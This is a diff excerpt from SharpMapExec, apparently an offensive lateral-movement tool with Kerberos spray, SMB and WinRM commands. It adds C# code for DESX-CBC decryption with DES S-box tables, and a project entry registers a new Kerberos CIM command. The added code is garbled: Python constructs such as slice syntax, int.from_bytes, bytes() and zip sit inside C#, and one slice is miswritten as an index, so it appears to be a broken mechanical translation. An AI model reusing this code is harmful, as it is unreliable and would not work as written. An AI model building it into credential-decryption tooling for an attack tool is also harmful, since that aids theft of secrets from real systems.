     151 + while (i != data.Count) {
     152 + var chunk = @__desx_decrypt_internal_block(data[i::(i + 8)]);
     153 + res += xor(chunk, IV);
     154 + IV = data[i::(i + 8)];
     155 + i += 8;
     156 + }
     157 + return res;
     158 + }
     159 +
     160 + public virtual object @__desx_internal_block(object data, object encrypt = false) {
     161 + var L = @int.from_bytes(data[4], "little", signed: false);
     162 + var R = @int.from_bytes(data[::4], "little", signed: false);
     163 + //t = 'ORIGINAL L: %s R: %s' % (L,R)
     164 + //input(t)
     165 + //print(hex(R))
     166 + R = rol32(R, 4);
     167 + //input(hex(R))
     168 + var Ta = (L ^ R) & 0xf0f0f0f0;
     169 + //input('Ta ' + hex(Ta))
     170 + L = L ^ Ta;
     171 + R = R ^ Ta;
     172 + L = rol32(L, 20);
     173 + Ta = (L ^ R) & 0xfff0000f;
     174 + //input('Ta ' + hex(Ta))
     175 + L = L ^ Ta;
     176 + R = R ^ Ta;
     177 + L = rol32(L, 14);
     178 + Ta = (L ^ R) & 0x33333333;
     179 + //input('Ta ' + hex(Ta))
     180 + L = L ^ Ta;
     181 + R = R ^ Ta;
     182 + R = rol32(R, 22);
     183 + Ta = (L ^ R) & 0x03fc03fc;
     184 + //input('Ta ' + hex(Ta))
     185 + L = L ^ Ta;
     186 + R = R ^ Ta;
     187 + R = rol32(R, 9);
     188 + Ta = (L ^ R) & 0xaaaaaaaa;
     189 + //input('Ta ' + hex(Ta))
     190 + L = L ^ Ta;
     191 + R = R ^ Ta;
     192 + L = rol32(L, 1);
     193 + //t = 'BEFORE F! L: %s R: %s' % (L,R)
     194 + //input(t)
     195 + if (encrypt) {
     196 + foreach (var i in Enumerable.Range(0, Convert.ToInt32(Math.Ceiling(Convert.ToDouble(14 - 0) / 2))).Select(_x_1 => 0 + _x_1 * 2)) {
     197 + var _tup_1 = F(L, R, des_key.desKey.roundKey[i]);
     198 + L = _tup_1.Item1;
     199 + R = _tup_1.Item2;
     200 + var _tup_2 = F(R, L, des_key.desKey.roundKey[i + 1]);
     201 + R = _tup_2.Item1;
     202 + L = _tup_2.Item2;
     203 + }
     204 + } else {
     205 + foreach (var i in Enumerable.Range(0, Convert.ToInt32(Math.Ceiling(Convert.ToDouble(-2 - 14) / -2))).Select(_x_2 => 14 + _x_2 * -2)) {
     206 + //print(i)
     207 + var _tup_3 = F(L, R, des_key.desKey.roundKey[i + 1]);
     208 + L = _tup_3.Item1;
     209 + R = _tup_3.Item2;
     210 + //t = 'F(%s) L: %s R: %s' % (i, L,R)
     211 + //input(t)
     212 + var _tup_4 = F(R, L, des_key.desKey.roundKey[i]);
     213 + R = _tup_4.Item1;
     214 + L = _tup_4.Item2;
     215 + //t = 'F(%s) L: %s R: %s' % (i, L,R)
     216 + //input(t)
     217 + //t = 'AFTER F! L: %s R: %s' % (L,R)
     218 + //input(t)
     219 + }
     220 + }
     221 + R = ror32(R, 1);
     222 + Ta = (L ^ R) & 0xaaaaaaaa;
     223 + L = L ^ Ta;
     224 + R = R ^ Ta;
     225 + L = ror32(L, 9);
     226 + Ta = (L ^ R) & 0x03fc03fc;
     227 + L ^= Ta;
     228 + R ^= Ta;
     229 + L = ror32(L, 22);
     230 + Ta = (L ^ R) & 0x33333333;
     231 + L ^= Ta;
     232 + R ^= Ta;
     233 + R = ror32(R, 14);
     234 + Ta = (L ^ R) & 0xfff0000f;
     235 + L ^= Ta;
     236 + R ^= Ta;
     237 + R = ror32(R, 20);
     238 + Ta = (L ^ R) & 0xf0f0f0f0;
     239 + L ^= Ta;
     240 + R ^= Ta;
     241 + L = ror32(L, 4);
     242 + return L.to_bytes(4, "little", signed: false) + R.to_bytes(4, "little", signed: false);
     243 + }
     244 + }
     245 +
     246 + public static List<List<int>> SymCryptDesSpbox = new List<List<int>> {
     247 + new List<int> {
     248 + 0x02080800,
     249 + 0x00080000,
     250 + 0x02000002,
     251 + 0x02080802,
     252 + 0x02000000,
     253 + 0x00080802,
     254 + 0x00080002,
     255 + 0x02000002,
     256 + 0x00080802,
     257 + 0x02080800,
     258 + 0x02080000,
     259 + 0x00000802,
     260 + 0x02000802,
     261 + 0x02000000,
     262 + 0x00000000,
     263 + 0x00080002,
     264 + 0x00080000,
     265 + 0x00000002,
     266 + 0x02000800,
     267 + 0x00080800,
     268 + 0x02080802,
     269 + 0x02080000,
     270 + 0x00000802,
     271 + 0x02000800,
     272 + 0x00000002,
     273 + 0x00000800,
     274 + 0x00080800,
     275 + 0x02080002,
     276 + 0x00000800,
     277 + 0x02000802,
     278 + 0x02080002,
     279 + 0x00000000,
     280 + 0x00000000,
     281 + 0x02080802,
     282 + 0x02000800,
     283 + 0x00080002,
     284 + 0x02080800,
     285 + 0x00080000,
     286 + 0x00000802,
     287 + 0x02000800,
     288 + 0x02080002,
     289 + 0x00000800,
     290 + 0x00080800,
     291 + 0x02000002,
     292 + 0x00080802,
     293 + 0x00000002,
     294 + 0x02000002,
     295 + 0x02080000,
     296 + 0x02080802,
     297 + 0x00080800,
     298 + 0x02080000,
     299 + 0x02000802,
     300 + 0x02000000,
     301 + 0x00000802,
     302 + 0x00080002,
     303 + 0x00000000,
     304 + 0x00080000,
     305 + 0x02000000,
     306 + 0x02000802,
     307 + 0x02080800,
     308 + 0x00000002,
     309 + 0x02080002,
     310 + 0x00000800,
     311 + 0x00080802
     312 + },
     313 + new List<int> {
     314 + 0x40108010,
     315 + 0x00000000,
     316 + 0x00108000,
     317 + 0x40100000,
     318 + 0x40000010,
     319 + 0x00008010,
     320 + 0x40008000,
     321 + 0x00108000,
     322 + 0x00008000,
     323 + 0x40100010,
     324 + 0x00000010,
     325 + 0x40008000,
     326 + 0x00100010,
     327 + 0x40108000,
     328 + 0x40100000,
     329 + 0x00000010,
     330 + 0x00100000,
     331 + 0x40008010,
     332 + 0x40100010,
     333 + 0x00008000,
     334 + 0x00108010,
     335 + 0x40000000,
     336 + 0x00000000,
     337 + 0x00100010,
     338 + 0x40008010,
     339 + 0x00108010,
     340 + 0x40108000,
     341 + 0x40000010,
     342 + 0x40000000,
     343 + 0x00100000,
     344 + 0x00008010,
     345 + 0x40108010,
     346 + 0x00100010,
     347 + 0x40108000,
     348 + 0x40008000,
     349 + 0x00108010,
     350 + 0x40108010,
     351 + 0x00100010,
     352 + 0x40000010,
     353 + 0x00000000,
     354 + 0x40000000,
     355 + 0x00008010,
     356 + 0x00100000,
     357 + 0x40100010,
     358 + 0x00008000,
     359 + 0x40000000,
     360 + 0x00108010,
     361 + 0x40008010,
     362 + 0x40108000,
     363 + 0x00008000,
     364 + 0x00000000,
     365 + 0x40000010,
     366 + 0x00000010,
     367 + 0x40108010,
     368 + 0x00108000,
     369 + 0x40100000,
     370 + 0x40100010,
     371 + 0x00100000,
     372 + 0x00008010,
     373 + 0x40008000,
     374 + 0x40008010,
     375 + 0x00000010,
     376 + 0x40100000,
     377 + 0x00108000
     378 + },
     379 + new List<int> {
     380 + 0x04000001,
     381 + 0x04040100,
     382 + 0x00000100,
     383 + 0x04000101,
     384 + 0x00040001,
     385 + 0x04000000,
     386 + 0x04000101,
     387 + 0x00040100,
     388 + 0x04000100,
     389 + 0x00040000,
     390 + 0x04040000,
     391 + 0x00000001,
     392 + 0x04040101,
     393 + 0x00000101,
     394 + 0x00000001,
     395 + 0x04040001,
     396 + 0x00000000,
     397 + 0x00040001,
     398 + 0x04040100,
     399 + 0x00000100,
     400 + 0x00000101,
     401 + 0x04040101,
     402 + 0x00040000,
     403 + 0x04000001,
     404 + 0x04040001,
     405 + 0x04000100,
     406 + 0x00040101,
     407 + 0x04040000,
     408 + 0x00040100,
     409 + 0x00000000,
     410 + 0x04000000,
     411 + 0x00040101,
     412 + 0x04040100,
     413 + 0x00000100,
     414 + 0x00000001,
     415 + 0x00040000,
     416 + 0x00000101,
     417 + 0x00040001,
     418 + 0x04040000,
     419 + 0x04000101,
     420 + 0x00000000,
     421 + 0x04040100,
     422 + 0x00040100,
     423 + 0x04040001,
     424 + 0x00040001,
     425 + 0x04000000,
     426 + 0x04040101,
     427 + 0x00000001,
     428 + 0x00040101,
     429 + 0x04000001,
     430 + 0x04000000,
     431 + 0x04040101,
     432 + 0x00040000,
     433 + 0x04000100,
     434 + 0x04000101,
     435 + 0x00040100,
     436 + 0x04000100,
     437 + 0x00000000,
     438 + 0x04040001,
     439 + 0x00000101,
     440 + 0x04000001,
     441 + 0x00040101,
     442 + 0x00000100,
     443 + 0x04040000
     444 + },
     445 + new List<int> {
     446 + 0x00401008,
     447 + 0x10001000,
     448 + 0x00000008,
     449 + 0x10401008,
     450 + 0x00000000,
     451 + 0x10400000,
     452 + 0x10001008,
     453 + 0x00400008,
     454 + 0x10401000,
     455 + 0x10000008,
     456 + 0x10000000,
     457 + 0x00001008,
     458 + 0x10000008,
     459 + 0x00401008,
     460 + 0x00400000,
     461 + 0x10000000,
     462 + 0x10400008,
     463 + 0x00401000,
     464 + 0x00001000,
     465 + 0x00000008,
     466 + 0x00401000,
     467 + 0x10001008,
     468 + 0x10400000,
     469 + 0x00001000,
     470 + 0x00001008,
     471 + 0x00000000,
     472 + 0x00400008,
     473 + 0x10401000,
     474 + 0x10001000,
     475 + 0x10400008,
     476 + 0x10401008,
     477 + 0x00400000,
     478 + 0x10400008,
     479 + 0x00001008,
     480 + 0x00400000,
     481 + 0x10000008,
     482 + 0x00401000,
     483 + 0x10001000,
     484 + 0x00000008,
     485 + 0x10400000,
     486 + 0x10001008,
     487 + 0x00000000,
     488 + 0x00001000,
     489 + 0x00400008,
     490 + 0x00000000,
     491 + 0x10400008,
     492 + 0x10401000,
     493 + 0x00001000,
     494 + 0x10000000,
     495 + 0x10401008,
     496 + 0x00401008,
     497 + 0x00400000,
     498 + 0x10401008,
     499 + 0x00000008,
     500 + 0x10001000,
     501 + 0x00401008,
     502 + 0x00400008,
     503 + 0x00401000,
     504 + 0x10400000,
     505 + 0x10001008,
     506 + 0x00001008,
     507 + 0x10000000,
     508 + 0x10000008,
     509 + 0x10401000
     510 + },
     511 + new List<int> {
     512 + 0x08000000,
     513 + 0x00010000,
     514 + 0x00000400,
     515 + 0x08010420,
     516 + 0x08010020,
     517 + 0x08000400,
     518 + 0x00010420,
     519 + 0x08010000,
     520 + 0x00010000,
     521 + 0x00000020,
     522 + 0x08000020,
     523 + 0x00010400,
     524 + 0x08000420,
     525 + 0x08010020,
     526 + 0x08010400,
     527 + 0x00000000,
     528 + 0x00010400,
     529 + 0x08000000,
     530 + 0x00010020,
     531 + 0x00000420,
     532 + 0x08000400,
     533 + 0x00010420,
     534 + 0x00000000,
     535 + 0x08000020,
     536 + 0x00000020,
     537 + 0x08000420,
     538 + 0x08010420,
     539 + 0x00010020,
     540 + 0x08010000,
     541 + 0x00000400,
     542 + 0x00000420,
     543 + 0x08010400,
     544 + 0x08010400,
     545 + 0x08000420,
     546 + 0x00010020,
     547 + 0x08010000,
     548 + 0x00010000,
     549 + 0x00000020,
     550 + 0x08000020,
     551 + 0x08000400,
     552 + 0x08000000,
     553 + 0x00010400,
     554 + 0x08010420,
     555 + 0x00000000,
     556 + 0x00010420,
     557 + 0x08000000,
     558 + 0x00000400,
     559 + 0x00010020,
     560 + 0x08000420,
     561 + 0x00000400,
     562 + 0x00000000,
     563 + 0x08010420,
     564 + 0x08010020,
     565 + 0x08010400,
     566 + 0x00000420,
     567 + 0x00010000,
     568 + 0x00010400,
     569 + 0x08010020,
     570 + 0x08000400,
     571 + 0x00000420,
     572 + 0x00000020,
     573 + 0x00010420,
     574 + 0x08010000,
     575 + 0x08000020
     576 + },
     577 + new List<int> {
     578 + 0x80000040,
     579 + 0x00200040,
     580 + 0x00000000,
     581 + 0x80202000,
     582 + 0x00200040,
     583 + 0x00002000,
     584 + 0x80002040,
     585 + 0x00200000,
     586 + 0x00002040,
     587 + 0x80202040,
     588 + 0x00202000,
     589 + 0x80000000,
     590 + 0x80002000,
     591 + 0x80000040,
     592 + 0x80200000,
     593 + 0x00202040,
     594 + 0x00200000,
     595 + 0x80002040,
     596 + 0x80200040,
     597 + 0x00000000,
     598 + 0x00002000,
     599 + 0x00000040,
     600 + 0x80202000,
     601 + 0x80200040,
     602 + 0x80202040,
     603 + 0x80200000,
     604 + 0x80000000,
     605 + 0x00002040,
     606 + 0x00000040,
     607 + 0x00202000,
     608 + 0x00202040,
     609 + 0x80002000,
     610 + 0x00002040,
     611 + 0x80000000,
     612 + 0x80002000,
     613 + 0x00202040,
     614 + 0x80202000,
     615 + 0x00200040,
     616 + 0x00000000,
     617 + 0x80002000,
     618 + 0x80000000,
     619 + 0x00002000,
     620 + 0x80200040,
     621 + 0x00200000,
     622 + 0x00200040,
     623 + 0x80202040,
     624 + 0x00202000,
     625 + 0x00000040,
     626 + 0x80202040,
     627 + 0x00202000,
     628 + 0x00200000,
     629 + 0x80002040,
     630 + 0x80000040,
     631 + 0x80200000,
     632 + 0x00202040,
     633 + 0x00000000,
     634 + 0x00002000,
     635 + 0x80000040,
     636 + 0x80002040,
     637 + 0x80202000,
     638 + 0x80200000,
     639 + 0x00002040,
     640 + 0x00000040,
     641 + 0x80200040
     642 + },
     643 + new List<int> {
     644 + 0x00004000,
     645 + 0x00000200,
     646 + 0x01000200,
     647 + 0x01000004,
     648 + 0x01004204,
     649 + 0x00004004,
     650 + 0x00004200,
     651 + 0x00000000,
     652 + 0x01000000,
     653 + 0x01000204,
     654 + 0x00000204,
     655 + 0x01004000,
     656 + 0x00000004,
     657 + 0x01004200,
     658 + 0x01004000,
     659 + 0x00000204,
     660 + 0x01000204,
     661 + 0x00004000,
     662 + 0x00004004,
     663 + 0x01004204,
     664 + 0x00000000,
     665 + 0x01000200,
     666 + 0x01000004,
     667 + 0x00004200,
     668 + 0x01004004,
     669 + 0x00004204,
     670 + 0x01004200,
     671 + 0x00000004,
     672 + 0x00004204,
     673 + 0x01004004,
     674 + 0x00000200,
     675 + 0x01000000,
     676 + 0x00004204,
     677 + 0x01004000,
     678 + 0x01004004,
     679 + 0x00000204,
     680 + 0x00004000,
     681 + 0x00000200,
     682 + 0x01000000,
     683 + 0x01004004,
     684 + 0x01000204,
     685 + 0x00004204,
     686 + 0x00004200,
     687 + 0x00000000,
     688 + 0x00000200,
     689 + 0x01000004,
     690 + 0x00000004,
     691 + 0x01000200,
     692 + 0x00000000,
     693 + 0x01000204,
     694 + 0x01000200,
     695 + 0x00004200,
     696 + 0x00000204,
     697 + 0x00004000,
     698 + 0x01004204,
     699 + 0x01000000,
     700 + 0x01004200,
     701 + 0x00000004,
     702 + 0x00004004,
     703 + 0x01004204,
     704 + 0x01000004,
     705 + 0x01004200,
     706 + 0x01004000,
     707 + 0x00004004
     708 + },
     709 + new List<int> {
     710 + 0x20800080,
     711 + 0x20820000,
     712 + 0x00020080,
     713 + 0x00000000,
     714 + 0x20020000,
     715 + 0x00800080,
     716 + 0x20800000,
     717 + 0x20820080,
     718 + 0x00000080,
     719 + 0x20000000,
     720 + 0x00820000,
     721 + 0x00020080,
     722 + 0x00820080,
     723 + 0x20020080,
     724 + 0x20000080,
     725 + 0x20800000,
     726 + 0x00020000,
     727 + 0x00820080,
     728 + 0x00800080,
     729 + 0x20020000,
     730 + 0x20820080,
     731 + 0x20000080,
     732 + 0x00000000,
     733 + 0x00820000,
     734 + 0x20000000,
     735 + 0x00800000,
     736 + 0x20020080,
     737 + 0x20800080,
     738 + 0x00800000,
     739 + 0x00020000,
     740 + 0x20820000,
     741 + 0x00000080,
     742 + 0x00800000,
     743 + 0x00020000,
     744 + 0x20000080,
     745 + 0x20820080,
     746 + 0x00020080,
     747 + 0x20000000,
     748 + 0x00000000,
     749 + 0x00820000,
     750 + 0x20800080,
     751 + 0x20020080,
     752 + 0x20020000,
     753 + 0x00800080,
     754 + 0x20820000,
     755 + 0x00000080,
     756 + 0x00800080,
     757 + 0x20020000,
     758 + 0x20820080,
     759 + 0x00800000,
     760 + 0x20800000,
     761 + 0x20000080,
     762 + 0x00820000,
     763 + 0x00020080,
     764 + 0x20020080,
     765 + 0x20800000,
     766 + 0x00000080,
     767 + 0x20820000,
     768 + 0x00820080,
     769 + 0x00000000,
     770 + 0x20000000,
     771 + 0x20800080,
     772 + 0x00020000,
     773 + 0x00820080
     774 + }
     775 + };
     776 +
     777 + public static object F(object L, object R, object keya) {
     778 + var Ta = keya[0] ^ R;
     779 + var Tb = keya[1] ^ R;
     780 + Tb = ror32(Tb, 4);
     781 + L ^= SymCryptDesSpbox[0][(Ta & 0xfc) / 4];
     782 + L ^= SymCryptDesSpbox[1][(Tb & 0xfc) / 4];
     783 + L ^= SymCryptDesSpbox[2][(Ta >> 8 & 0xfc) / 4];
     784 + L ^= SymCryptDesSpbox[3][(Tb >> 8 & 0xfc) / 4];
     785 + L ^= SymCryptDesSpbox[4][(Ta >> 16 & 0xfc) / 4];
     786 + L ^= SymCryptDesSpbox[5][(Tb >> 16 & 0xfc) / 4];
     787 + L ^= SymCryptDesSpbox[6][(Ta >> 24 & 0xfc) / 4];
     788 + L ^= SymCryptDesSpbox[7][(Tb >> 24 & 0xfc) / 4];
     789 + return Tuple.Create(L, R);
     790 + }
     791 +
     792 + public static object rol32(object n, object d) {
     793 + return (n << d | n >> 32 - d) & 0xFFFFFFFF;
     794 + }
     795 +
     796 + public static object ror32(object n, object d) {
     797 + return (n >> d | n << 32 - d) & 0xFFFFFFFF;
     798 + }
     799 +
     800 + public static object xor(object d1, object d2) {
     801 + return bytes(from _tup_1 in zip(d1, d2).Chop((a,b) => (a, b))
     802 + let a = _tup_1.Item1
     803 + let b = _tup_1.Item2
     804 + select a ^ b);
     805 + }
     806 +}
     807 + 
  • ■ ■ ■ ■ ■
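--- a/SharpMapExec/SharpMapExec.csproj
+++ b/SharpMapExec/SharpMapExec.csproj
@@ -77,6 +77,7 @@
 <Compile Include="Commands\ICommand.cs" />
 <Compile Include="Commands\kerberosSmb.cs" />
 <Compile Include="Commands\KerberosSpray.cs" />
+<Compile Include="Commands\kerberosCim.cs" />
 <Compile Include="Commands\kerberosWinrm.cs" />
 <Compile Include="Commands\NtlmReg32.cs" />
 <Compile Include="Commands\NtlmSmb.cs" />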
  • SharpMapExec/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
    Binary file.